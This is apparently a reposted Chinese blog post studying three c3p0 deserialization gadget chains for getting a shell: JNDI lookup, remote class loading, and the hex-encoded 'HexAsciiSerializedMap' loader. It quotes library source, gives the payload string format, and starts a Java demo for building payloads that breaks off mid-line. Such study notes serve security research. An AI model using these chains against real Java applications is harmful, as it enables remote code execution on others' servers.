作者:mobiledu2502870067 | 来源:互联网 | 2023-10-12 20:52
目前c3p0有三种方式getshell加载远程类jndihex序列化字节加载器前两个可以放在一起学习,在com.mchange.v2.c3p0.impl.PoolBackedD
目前c3p0有三种方式getshell
前两个可以放在一起学习,在com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject,可以看到,如果是IndirectlySerialized的实例就会去调用getObject方法
if (o instanceof IndirectlySerialized) {o = ((IndirectlySerialized)o).getObject();
}
而它的实现类只有一个com.mchange.v2.naming.ReferenceIndirector.ReferenceSerialized,我们可以看看
触发jndi
很明显如果contextName不为空,则会触发,这里没必要继续说下去了
加载远程类
接下来是第二个,这也是ysoserial本身集成的一个payload,继续往下看,ReferenceableUtils.referenceToObject,也是很明显通过URLClassloader加载远程类,并且默认初始化了,因此可以直接在静态块里面放入恶意数据
关于writeObject的话,以ysoserial的为例,PoolSource implements ConnectionPoolDataSource, Referenceable,只要不实现序列化接口,并实现getReference方法返回我们的Reference对象即可,也是很简单的
hex序列化字节加载器
这个更多会用到在fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等里面配合使用
当在userOverridesAsString当中设置了序列化数据后,当调用set方法setUpPropertyListeners时就能触发
可以看到里面对序列化数据的处理
public static Map parseUserOverridesAsString(String userOverridesAsString) throws IOException, ClassNotFoundException {if (userOverridesAsString != null) {String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1);byte[] serBytes = ByteUtils.fromHexAscii(hexAscii);return Collections.unmodifiableMap((Map)SerializableUtils.fromByteArray(serBytes));} else {return Collections.EMPTY_MAP;}
}
最后触发原生反序列化
后面才发现又个地方比较坑,在com.mchange.v2.c3p0.impl.C3P0ImplUtils#parseUserOverridesAsString
String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1);
这里会把最后一位吃了有点恶心,因此构造payload的时候要像这样
String payload = "HexAsciiSerializedMap:"+HexString+":";
这里给个demo方便测试
import com.govuln.deserialization.CB1;
import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;
import hudson.remoting.Base64;
import javassist.ClassPool;
import javassist.CtClass;
import org.python.antlr.ast.Str;import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.HashSet;
import java.util.LinkedList;
import java.util.PriorityQueue;public class Test {public static byte[] toByteArray(InputStream in) throws IOException {byte[] classBytes;classBytes = new byte[in.available()];in.read(classBytes);in.close();return classBytes;}public static String bytesToHexString(byte[] bArray, int length) {StringBuffer sb = new StringBuffer(length);for(int i = 0; i
京公网安备 11010802041100号